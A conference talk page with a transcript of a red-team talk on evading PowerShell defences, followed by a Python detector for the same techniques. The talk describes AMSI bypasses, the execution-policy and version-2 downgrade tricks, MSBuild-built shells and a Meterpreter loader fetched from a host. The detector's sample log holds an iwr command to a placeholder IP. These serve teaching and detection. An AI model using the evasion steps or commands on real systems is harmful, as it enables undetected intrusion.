
PowerShell's Return to Power

BSides Dallas/Fort Worth · 2021 · 35:15 · 55 views · Published 2021-11
Tags: Category: Technical · Team: Red · Style: Talk

About this talk
PowerShell remains a critical attack surface despite the shift in offensive security focus toward C#. This talk explores modern evasion techniques for bypassing AMSI, script execution policies, and EDR controls, demonstrating that techniques from 2015–2016 continue to work with minimal modification. Schloss covers practical malware deployment methods using PowerShell's native capabilities and discusses defensive strategies.
Original YouTube description:

BSidesDFW 2021 Track 2 Session 2 - 06 Nov 2021

PowerShell's Return to Power

Over the past few years, we saw the rise of popularity of offensive C# over PowerShell. This sparked a plethora of new OffSec-focused C# tools and executables bypassing the watchful eye of the security community. However, this shift of focus has allowed attackers to garner new techniques on how to bypass and defeat the organic controls that Microsoft has put into place to protect the scripting application. We believe that PowerShell exploits and attack methods are still alive and well. With PowerShell still being deployed on every machine by default, there is still a massive security hole for your organization that could allow an attacker to navigate your environment without ever needing to place an executable "on disk".

Dahvid Schloss
Dahvid is a Manager and Lead in the Offensive Security service offering within Echelon. With over 10 years of cyber-attack and defense experience, Dahvid has previously worked as a Red Team Operator with a Big Four firm, served in the military, leading, conducting, and advising on special operations offensive cyber operations, and has developed an extensive framework in PowerShell. His background in cybersecurity includes logical, social, and physical exploitation as well as incident response and system/network device hardening.

Transcript [en]:

Hey everyone, thanks for coming to listen to a grown man complain about PowerShell. My name is Dahvid Schloss, I'm an offensive security lead at Echelon Cyber and Risk. What that means is basically I run all of our pen testing, red teaming, anything that emulates a criminal; that's going to be my wheelhouse. You can find my email address here in case you want to link up with me later, or you can hit me up on LinkedIn; I do post tips and tricks on red teaming periodically on there, so come check me out. I also like to say I'm a self-proclaimed malware dev; I like to see if I can defeat AVs.

Doesn't always happen. And then a little bit about our company, just because we're small: we're a cyber security firm, we offer defensive, advisory and offensive services, so come check us out if you'd like. So what is today's goal? Basically I want you guys to have a healthy dose of paranoia about having PowerShell on your users' workstations. Ever since we kind of moved away from PowerShell as a main attack platform and moved into C#, using things like SharpHound or SharpDump or other things like that, we've kind of ignored that PowerShell is still a very viable attack path for attackers, and as we'll show in this presentation, things that have been

around since like 2015, 2016 still function as well as they did back then. So how are we going to do that? Well, we're first going to go over the allure of PowerShell: why IT admins love it, why attackers love it. Then we're going to go into bypassing controls, so that's going to be script signing and script execution, AMSI, whitelisting and some EDR enumeration alerts, and then we're going to wrap all of that up into malware deployment and how you can protect yourself. So let's start off. Why do admins love it? Well, basically it's everywhere, right? Its market share is huge; it's on Windows, Linux, Mac. I had it on my Linux

machine, I had it on my Mac machine when I had a Mac. There wasn't a need to really learn anything new as far as languages go; it's just there. It's easy to use and learn. This is actually the first application I learned, even before Python or C; PowerShell is the first thing, and it is super simplistic. There are resources everywhere. And then lastly, it enables more functions around remote administration. When I was an IT admin it would take my tasks from a couple hours down to a couple minutes. It's really a useful tool for admins. But why do attackers love it?

Basically it's everywhere, right? It's on Windows, Linux, Mac. I don't need to learn Impacket to go from Linux to Windows; it already talks natively in that regard. I have it on my Kali Linux machine. Super simplistic, it's easy to use and learn. There's a ton of resources when it comes down to offensive PowerShell usage, as people just like to go out there and show off what they can do with it. And it enables more functions around remote administration, so if you have PowerShell already installed on your Linux or Kali Linux machine you really don't need to learn other tools in order to interact with Windows environments, and you can get your

malware and other functions from your Linux to Windows pretty quickly. So really the attackers here have the advantage, right? I think what a lot of people seem to forget is that scripts can be run entirely from memory; you can just copy and paste it from the internet into a terminal, as long as you have terminal access. To caveat that, if you have a really good EDR you might be able to capture some of those malicious scripts in the temporary files, but they are only temporary. Because of this, signature-based AVs have a really hard time detecting activity that's being done from within a PowerShell shell, because PowerShell is

considered a trusted PID; it's not going to be constantly reading the memory that's being run in there. Just like Python is scriptable C, this is scriptable .NET, as we'll get into a little bit later. And then everybody just likes to bash on Microsoft, so organic security functions are constantly getting defeated and constantly being publicized, and it's wonderful for us attackers and kind of annoying for the defenders. That kind of sets the stage for what we're going to be doing. We're mostly going to focus today on bypassing organic controls, with a little bit of non-organic controls, and one of the first controls we're going to talk about is script

signing execution. Now, for the attackers in the room, you guys are all going to kind of groan and be like, oh really, this guy's going to be talking about script signing execution? For those who don't know, this function is a control that's set forth by Microsoft to restrict you from executing scripts that aren't already signed. In its default policy, which is Restricted, you are restricted down to scripts (not shells, sorry) that are signed by Microsoft. One thing to point out here is that script signing execution is not a security control, but a lot of people tend to use it as a security control. So

in this screenshot we can see that we have a low-privileged user trying to Get-ExecutionPolicy, which is set to Restricted, and then they're trying to Set-ExecutionPolicy to Bypass, which will allow you to just run whatever script you want. Most administrators will recognize this: there's an access denied prompt that gets pushed back, so you're not able to change it. The reason why this isn't a security control, and Microsoft has said it's not a security control, is because it's just very simple to bypass. Let's say you don't have admin privileges but you still want to run scripts on a device. All you have to do is actually

execute powershell.exe -ep, or -ExecutionPolicy, Bypass and it'll put it into the Bypass policy. The reason this happens is when you're doing Set-ExecutionPolicy, the command is actually trying to set a registry hive within the local machine registry, which requires admin access. But when you do powershell.exe -ep Bypass, it's only setting it for that instance; it's not going to navigate into another window, so if you re-execute PowerShell it's going to go back to the machine default. So hopefully, now that you guys know that script signing execution is not a security control, you aren't going to use it as a security control moving forward, because

it is quite common to see that. This is going to lead us right into the fun stuff, which is AMSI, the Antimalware Scan Interface. This is going to be the bulk of the presentation; we're going to talk about methods that worked in 2015 and still work today with very minor modifications. What AMSI is, is a known-good hook that was developed by Microsoft for defense products to integrate into their systems, and it's integrated into UAC, Windows Script Host, Office macros, PowerShell, VBScript, you name it. If Microsoft provides it as a function or a scripting language, you're going to see AMSI integrated into that,

and it's really cool because it'll block known malicious scripts and functions. So the IEX DownloadString command, which is very commonly used by us attackers to import malicious scripts into PowerShell, is just completely blocked with AMSI. It also looks out for strings like Mimikatz, BloodHound, PowerView; I believe it still alerts on Matt Graeber's name. If it's malicious, it's going to try to alert on it. Some of the known integrated antivirus applications that are using this right now are McAfee, Sophos, Kaspersky, Windows Defender (kind of a duh there), and there are probably more, but this isn't a list that is provided by Microsoft, at least not from what I've seen,

so you have to kind of dig through, but there are people who are using this known-good hook by Microsoft. Unfortunately, because Microsoft is always trying to do the backwards compatibility thing, there's a very, very easy bypass when it comes down to AMSI, which is just to downgrade PowerShell. PowerShell 2.0 is installed by default; it would be considered a living-off-the-land binary. Some things that you lose out on when you go down to PowerShell 2.0 is automatic script block logging on suspicious scripts, so if you aren't already setting up script block logging, you're no longer getting any of those alerts for suspicious scripts. The only caveat I would put here is that

if you are looking to run PowerShell 2.0, you do need .NET version 2.0. But then a second caveat to that is, if you have older software on your network that requires .NET 3.5, then .NET 2.0 is installed, because they are bundled together for some reason. So what does that look like? Very simply, it's quite the easiest bypass in the world, and this gets a lot of my clients. The first thing you can see here is we're running $PSVersionTable; that's just to show you that we are running version 5.1. Then I'm trying to echo AmsiUtils. The reason why I do AmsiUtils is because I know it's a known

string that AMSI will try to block you from using, because it doesn't like you calling itself. So we try to echo AmsiUtils, and it tells us, hey, no, that's not allowed, you're blocked by the antivirus. Then you just run powershell.exe -version 2, and now when you echo AmsiUtils it works. Super simple, very easy, still works in 2021. This has been around forever; I don't know why they haven't just removed the binary as a whole, but if you don't have this disabled on your network, it's probably a good thing to do that now, or soonish. So what happens if you can't run PowerShell version 2?

Well, then we need to get into some AMSI bypassing, or AMSI crashing. When we are trying to defeat AMSI as attackers, we're always trying to put AMSI into a failed state. The reason being is, when AMSI is in a failed state, it doesn't have a recovery function, so it just continues to stay failed. So if you're able to crash it for that instance, let's say you have a PowerShell terminal and you crash AMSI, you now have an AMSI-free terminal; if you rerun PowerShell, AMSI will come back. The methods we're going to talk about today are a few, but this one is going

to be the Matt Graeber method, which uses reflection. Back in 2015, Matt Graeber found that it was really, really simple to just call AmsiUtils, get the amsiInitFailed field, and set that to true, and that's enough to crash AMSI: it goes, oh yeah, hey, my field says I don't work no more, and it doesn't. Thankfully, Microsoft was really quick on the fix, and they implemented it so you couldn't call AmsiUtils or amsiInitFailed anymore. The problem is, despite Microsoft saying that they check for concatenation before execution with AMSI, it wasn't true. So the line below it, which has the concatenated

AmsiUtils and amsiInitFailed, worked up until last year. It no longer works, and this took us down into a dive on why it no longer works, which we're going to explore right now. The first thing we needed to figure out is our baseline. We needed to look at System.Management.Automation.AmsiUtils and see if we can call it. It does block it, because we are not trying to concatenate anything or obfuscate in any form or fashion. But if we do concatenate AmsiUtils, it does print, which means that still technically works in 2021. That led us to, okay, so how

deep down the rabbit hole do we need to go before AMSI starts blocking us? So the next logical step was to go out one field: let's go and get the amsiInitFailed field. With concatenation on amsiInitFailed it does read out; we can see the name of the field, we can get the location of it, what type of field it is, is it public, all the information that we possibly need on it, which means concatenation really isn't the problem here. There's something else going on, and thankfully, shout out to Secure This, who has a great write-up on what is actually going on, but it

turns out that when you are calling an assembly type, and then you're getting the field, and then you're trying to set the value, AMSI does some regex, sees that and goes, okay, now let's concatenate this all and see what it's really calling, so that they can make sure you're not calling AmsiUtils. Which is cool; that's really a neat fix for them. But my number one rule when defeating PowerShell is: when in doubt, encode it out. The cool thing about that is I like to use hex, because Base64 is already organically in PowerShell, right? You can call a Base64-encoded command from within PowerShell; hex is not,

so in this case you can just concatenate AmsiUtils and format it into hex using UTF encoding. Once we have our text in hex, we need to turn our hex into text, so you get this sweet little Dr. Seuss rhyme in it, right? So we need a one-liner to turn that hex back into text, and that's pretty simple, because all we have to do is split each hex section and then convert that back into a character, which we can do with the code below. When we do our one-liner and we print it out, it prints out AmsiUtils, and we haven't even defeated AMSI at all. So it's not

checking this execution before we go forward, which is really neat. So what we can do with that is we can just replace in our code AmsiUtils and amsiInitFailed with this small section of code to turn our hex back into text, and what that looks like is this. The first thing we're going to do is call AmsiUtils to show you that AMSI is indeed working, we're being blocked. Then we're going to copy in our hex-encoded text, hit enter, call AmsiUtils again, and now we can see that AmsiUtils is being called; we can echo it out, which is showing us that AMSI has been defeated.

So this method that was developed in 2015 is still functioning to this day, with very minimal changing. We haven't had to obfuscate it too much; we really haven't had to do a whole lot. I'm not doing a Caesar cipher, I'm not doing any sort of encryption, I'm just changing the way that the code or the text is being interpreted, and now it works. So us ignoring the problem for so long has allowed us as attackers to evolve and create small little changes to code, and things that have been working for five, six years still work.

So the next piece we're going to talk about is the Rasta Mouse method. The reason why I wanted to bring this method up is because I had mentioned that PowerShell is scriptable .NET. In this case this is just C# code that's able to be run in PowerShell; very simplistic, very easy. What it's doing is it's patching the DLL, it's patching the library function AmsiScanBuffer. A fun fact about AMSI is that AMSI's functions like to have a static first couple of bytes in all of its functions, which AMSI will go out and check to see if those bytes are still

the same. Those first couple of bytes are "AMSI", right? So it's checking, hey, does the function still start with AMSI? Yeah, it still functions, all right, cool, we're going to keep going, so it doesn't crash. So what you can do is actually just find the address for AmsiScanBuffer, AmsiContext, things like that, rewrite the first couple of bytes with literally anything that you want, and you'll crash AMSI. It's pretty neat. This is a pretty obvious kind of attack towards AMSI: it's loading the loaded DLL that's within PowerShell, which is kind of a cool idea, and then patching out some bytes, which,

if we go and look at how that looks, you don't have to do anything fancy with this. This still works; I haven't had to change any of the code minus concatenation. Put that in, hit enter, now we type AmsiUtils again, maybe, there we go, and we're able to call it. So some things that should be going through your mind at this point as well, outside of AMSI, is if you can edit loaded DLLs, can you unhook DLLs or re-hook clean DLLs? PowerShell is powerful, so it's pretty neat. I like to call this one out because a lot of people think that you have to get super

complex with it. I haven't changed any of the code that I got off of GitHub on this one, and I've used it in the past and it hasn't been caught. It's a pretty easy method for defeating AMSI. So what happens when you can't run the code to bypass AMSI, whether that be because PowerShell is not a whitelisted application or you're operating in restricted language mode? You could bypass it by going down to PowerShell version 2.0, or you can do what I like to do, which is build your own PowerShell, because PowerShell is really just a bunch of DLLs loaded on top of the

command prompt, and then they called it PowerShell. Kind of obvious when you look at it that way, but it's a very simple way of doing that. You can actually just go to GitHub, go to this MSBuildShell, download it. I've put this on clients' machines in the past when we've been doing red teams or pen tests, and ultimately it hasn't been caught by an antivirus, because, well, it's not malicious in itself. If they start alerting on the functions in there, they will start potentially having false positives with other applications. So in this case MSBuildShell from this GitHub page is using the MSBuild.exe living-off-the-land binary, which is

included with .NET version 4.0. In this case we have the command prompt open; I'm running $PSVersionTable to show you guys that it does not have any sort of PowerShell stuff loaded (oops, try that again), and then I'm calling MSBuild.exe with our MSBuildShell.csproj project file. So you don't need to have Visual Studio Code or Visual Studio or any sort of compilation program; all you need to have is MSBuild.exe, which will build a .csproj file. When we hit enter here it's going to start building the engine, and then we're presented with this wonderful bright blue screen, and when we type $PSVersionTable we get the actual response that we're looking

for. Now, you'll probably notice some red up here; that's the AMSI bypass that it's trying to do. It's the old Matt Graeber method without any obfuscation; you can go into the code and edit it if you really want to, so that you can get past AMSI and all that jazz, but it's not necessary. Additionally, the only other function that you lose by building your own PowerShell is the ability to tab-complete commands, but as an attacker I don't think you're really too worried about that if you're just trying to get PowerShell on the device. When we exit, we can see that we're back down to a command prompt. So here are some more ways to do it. I

don't want to get too deep in the weeds about this, because we could go a whole hour just on building PowerShell itself, but there are projects out there like the PowerShell DLL project, which you can use with anything that executes DLLs, or my personal favorite, which is the SyncAppvPublishingServer.vbs script, which is included by default as well. I'm not too sure why, but if you put in that break, iwr and then your IP, and have a netcat listener, you'll get a PowerShell callback. Super cool. Shout out to ired.team here, because they have a lot of great write-ups on how to use some of these PowerShell DLL project bypasses; go check them out.

So we've talked a lot about the organic controls. We're going to kind of wrap it up here, as far as bypassing controls, with some EDR detection controls. What I think a lot of people don't seem to realize is that commands like ipconfig, whoami, netstat, netsh, these are all DOS applications that are in your C:\Windows\System32 folder. EDRs have gotten really smart on how to detect when a system is being enumerated, because we as attackers haven't really learned to not just systematically call ipconfig, whoami, systeminfo, a ton of these commands, all in a short duration, which a human isn't necessarily going to do,

right? An IT man may come in and do an ipconfig or whoami or netstat, but he's not going to run through this whole exhaustive list of, let me get all of the information here. So the really, really cool thing about PowerShell is that it's scriptable .NET, which allows us to do really fun things like call environment variables or call the Windows API. Let's say we want to do whoami; whoami gives you this desktop-attack-av, lowpriv, like, okay, that's cool. Well, we can change that up and just call the environment variables, like $env:USERDOMAIN and $env:USERNAME, and it kind of has a better output,

in my opinion; I like that a little bit more. Or let's say we want to do ipconfig; we can use the .NET DNS library and GetHostAddresses for our localhost, and it'll print it out. It's not as pretty, don't get me wrong, but it does function. So we can use PowerShell to actually function kind of like how an installer would enumerate a device, and that's going to get around the lower-end EDR products. This is kind of fun; you can experiment with it, you can find different ways of printing out the same exact data. It's almost like reinventing the wheel, but it does avoid detection, and for us red teamers

avoiding detection is always super important. So that wraps it up for evasion techniques, our bypassing, and we talked all about that just so we could get to this malware deployment, so we can really sink in that, what do you want to call it, that paranoia. PowerShell is really, really nice at being able to execute code, because you just take your C# code and turn it into PowerShell. This is exactly why everybody went from PowerShell to C# when all of the defense was looking into PowerShell, thanks to PowerShell Empire and others. But we stopped paying attention, and that allowed for the same old techniques to come back out and

still work. To get basic code execution you really only need a few things: some allocated memory, the ability to copy that memory, or your shellcode, into the allocated memory, and the ability to create a thread. Now, if you really want to get into the weeds of things and how you would evade, you would use others, but this is just basic code execution. Then you also need to do some avoidance of AVs. It's not as important, but it is still kind of a requirement. You need a way to be able to reflectively call your DLLs, especially because if you don't reflectively call those DLLs it will create a temporary

DLL on disk, and then some shellcode obfuscation, which PowerShell makes super simple as well. As far as importing and executing your code, it's very, very simple. The very top line here, this DllImport, is taken straight from P/Invoke; this is how you would write it in C#. Then the line below it is actually using Matt Graeber's reflective DLL loading method, so almost exactly the same, but in this case we don't have an unsigned integer, you only have UInt32 and UInt64. Then when you want to go execute that code it's literally the same; the only difference here is your type

name is what you are building with the Matt Graeber reflective DLL loading, so you do need to create a type, but it's no different than how you would call it anywhere else. So taking your malware from C# and bringing it into PowerShell: super simple. That brings us into the last piece of it, which is shellcode obfuscation. PowerShell reads bytecode as decimal instead of hex, so I prefer decimal over hex, because I just find 000 to 255 so much easier than 000 to 0FF, and when you have this as decimal you can apply really basic encoding principles to it, like the Caesar cipher.

I think a principle that is missed a lot by attackers is you don't have to be complex with your obfuscation; you just have to have it custom. So if you use a Caesar cipher it will work; I've run code like Meterpreter code on systems just using a Caesar cipher. What a Caesar cipher is, is taking a byte and pushing it to the right or left, depending on which way you want to go. In this case we'll push everything five to the right, so 000 becomes 005, but that creates a problem with an integer overflow, because you can't go over 256. So 255 would be 260; that's not good, that's not going to work.

The nice thing is PowerShell provides you with a really easy operator for modulus, so you can take your number plus or minus your offset and then use modulus, which is the percent sign, of 256. So if we're pushing everything to the right, 000 becomes 005 and 255 becomes 004. Super simple, super easy to implement. So what does that look like? In this case I built a Meterpreter shell in a PowerShell script using meterpreter reverse https. We're going to go ahead and run that, and then we're going to go into our AV dev machine, my machine which has AV on it, and I talked a lot about copying and

pasting things; this time we're just going to import it. One thing to note here is, before we begin, the PowerShell PID is 11496. That's important, because we are not going to create a brand new process, we're just creating a new thread within this process. No,

okay, let's go back. So we're going to look at the PID again, and then we're going to copy in AmsiUtils, type it in, show you that AMSI is functioning, and then we're going to copy in our .NET way of importing. I had mentioned that IEX DownloadString gets blocked by AMSI; what's really cool is .NET WebRequest does not. So in this case, before we move on, I'll go through this code real quick. We're calling the .NET WebRequest, we're going to create a new request towards our malicious host, and we're going to download bsides.ps1. We're going to grab that response, and then we're going to get the stream, and

we're going to download that data stream; we're going to read it all the way to the end, and we're going to import that into a variable. Once we have that variable, we're going to execute it using IEX, so we're not using IEX DownloadString to instantly execute upon that code. When we execute it down here, it'll print out $content; we run IEX $content, and now we have the script in here. So when we write Invoke-BSides, execute that, and then we execute Order 66, or offset 66, it's running. You notice there's nothing being alerted down at the bottom, no antivirus alerts. We come back here,

and we have a reverse shell, and we get the UID; we're on the low-privilege user, and our PID is 11496. The way we're doing it, with creating a thread, is that when we close this Meterpreter shell it will crash PowerShell, just as a caveat. But that's a little concerning, right? It's so simple to execute code on a machine just using PowerShell; still, nothing's really had to change in the last couple of years. We haven't really had to change the way that we've done code execution. Now, you can get even more fancy with it and make it a lot harder for the defenders to go and find your activity,

but just this basic code execution still works. So now that you guys are hopefully a little paranoid, what can you do about it? I dump everything into these four simple steps. The first one is: disable PowerShell. I personally don't think that every user needs to have it. You wouldn't give your users Python, so why would you give every user PowerShell? That being said, if you need to use it for your administration, or you have users that have legitimate reasons to use it, then you need to start looking at application whitelisting and blacklisting, and if you do that, then you need to really expand your application

blacklisting. You need to look at every living-off-the-land binary that's out there; not everything that Microsoft provides to you is actually safe. I don't know if you guys remember DDEAUTO, but that was a complete security flaw, and they just said, oh, it's a feature, it's not a flaw. I would say definitely increase your security products; go for AI-based security products. I know I've mentioned that it is possible to re-hook or unhook DLLs, especially those like kernel32 or ntdll, but when you unhook those DLLs, the more advanced AI-based security products are able to determine when a system is being bypassed.

And the last thing, it's not necessarily for any of you guys out there, maybe, but Microsoft, you guys definitely need to fix your stuff. There's just too many inherent flaws with these security controls, and ultimately a defeat that was built five years ago still works today, because AMSI doesn't function in the way that it is advertised, and that's kind of concerning. But with that, this is my information again, in case you wanted to download the slides; you can come to our website /bsides and download those slides. Reach out to me anytime on LinkedIn, send me an email; I like talking about just about anything, I'm too extroverted for my own good.

So with that, thank you very much for your time; it was a pleasure. I hope you guys have a good rest of your day. Ask any questions.
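As an added defensive example (not code from the talk or the speaker), the following Python flags the patterns the talk walks through in process-creation command lines: the per-process execution-policy bypass, the PowerShell 2.0 downgrade, MSBuild-built shells, SyncAppvPublishingServer.vbs abuse, references to AMSI internals, and bursts of built-in enumeration commands. The log format, hostnames, users and paths are constructed for the example and do not come from any real product.

```python
"""Detect the PowerShell evasion patterns described in the talk from
process-creation command lines (constructed sample log, not real telemetry)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed log format for this example (not a real product's schema).
LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$')

# Command-line rules as (label, regex) pairs; all case-insensitive.
RULES = [
    # powershell.exe -ep/-ex/-exec/-ExecutionPolicy Bypass: per-process, no admin needed
    ("execution-policy-bypass",
     re.compile(r"powershell(?:\.exe)?\b.*\s-(?:ep|ex\w*)\s+(?:bypass|unrestricted)\b", re.I)),
    # powershell.exe -version 2 / -v 2: downgrade to the engine without AMSI
    ("powershell-v2-downgrade",
     re.compile(r"powershell(?:\.exe)?\b.*\s-v\w*\s+2(?:\.0)?\b", re.I)),
    # MSBuild.exe compiling a project file (the MSBuildShell.csproj approach)
    ("msbuild-project-build",
     re.compile(r"msbuild(?:\.exe)?\b.*\.(?:csproj|proj)\b", re.I)),
    # SyncAppvPublishingServer.vbs with a ';' break to run an extra command
    ("syncappv-script-injection",
     re.compile(r"syncappvpublishingserver\.vbs\b.*;", re.I)),
    # Direct references to the AMSI internals the talk's bypasses touch
    ("amsi-tamper-string",
     re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer|amsicontext", re.I)),
]

# Built-in enumeration tools; many of them in a short window is what EDRs key on.
ENUM_TOOLS = {"ipconfig", "whoami", "netstat", "netsh", "systeminfo"}

# Constructed sample events (hostnames, users, paths and IP placeholder are made up).
SAMPLE_LOG = r'''
2021-11-06T10:15:02Z host=WS01 user=lowpriv image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -ep bypass -File C:\Users\lowpriv\a.ps1"
2021-11-06T10:15:40Z host=WS01 user=lowpriv image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -version 2 -NoProfile"
2021-11-06T10:15:55Z host=WS01 user=lowpriv image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -version 2 -Command echo AmsiUtils"
2021-11-06T10:16:05Z host=WS01 user=lowpriv image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe cmd="MSBuild.exe C:\Users\lowpriv\MSBuildShell.csproj"
2021-11-06T10:16:30Z host=WS01 user=lowpriv image=C:\Windows\System32\wscript.exe cmd="wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs n;iwr http://PLACEHOLDER_IP/"
2021-11-06T10:17:00Z host=WS01 user=lowpriv image=C:\Windows\System32\ipconfig.exe cmd="ipconfig /all"
2021-11-06T10:17:03Z host=WS01 user=lowpriv image=C:\Windows\System32\whoami.exe cmd="whoami"
2021-11-06T10:17:06Z host=WS01 user=lowpriv image=C:\Windows\System32\NETSTAT.EXE cmd="netstat -ano"
2021-11-06T10:17:09Z host=WS01 user=lowpriv image=C:\Windows\System32\systeminfo.exe cmd="systeminfo"
2021-11-06T11:02:11Z host=WS02 user=itadmin image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -NoProfile -File C:\Scripts\backup.ps1"
2021-11-06T11:30:00Z host=WS02 user=itadmin image=C:\Windows\System32\ipconfig.exe cmd="ipconfig"
'''


def parse_line(line: str) -> Dict[str, str]:
    """Parse one log line into its fields; raises on malformed input."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()


def match_rules(cmd: str) -> List[str]:
    """Return the label of every rule whose regex matches the command line."""
    return [label for label, rx in RULES if rx.search(cmd)]


def image_name(image: str) -> str:
    """Lower-cased file name of an image path without its .exe extension."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def enumeration_bursts(events, window_s: int = 60, threshold: int = 4) -> List[Tuple[str, str, int]]:
    """Per (host, user), report a burst when >= threshold distinct enumeration
    tools ran within window_s seconds. Returns (host, user, distinct_tools)."""
    runs = defaultdict(list)
    for ev in events:
        tool = image_name(ev["image"])
        if tool in ENUM_TOOLS:
            ts = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
            runs[(ev["host"], ev["user"])].append((ts, tool))
    bursts = []
    for (host, user), items in runs.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            tools = {t for ts, t in items[i:] if ts - start <= timedelta(seconds=window_s)}
            if len(tools) >= threshold:
                bursts.append((host, user, len(tools)))
                break  # one finding per principal is enough
    return bursts


def analyze(log_text: str) -> Dict[str, list]:
    """Run every rule over a log; returns command-line hits and enumeration bursts."""
    events = [parse_line(l) for l in log_text.strip().splitlines() if l.strip()]
    hits = [(ev["user"], label, ev["cmd"]) for ev in events for label in match_rules(ev["cmd"])]
    return {"hits": hits, "bursts": enumeration_bursts(events)}


if __name__ == "__main__":
    for user, label, cmd in analyze(SAMPLE_LOG)["hits"]:
        print(f"{label:28} {user:10} {cmd}")
    print(analyze(SAMPLE_LOG)["bursts"])
```

Script block logging is the complementary signal: the execution-policy and v2 findings here come from the command line alone, which is why the talk's point about losing script block logging on the v2 engine matters for the remaining rules.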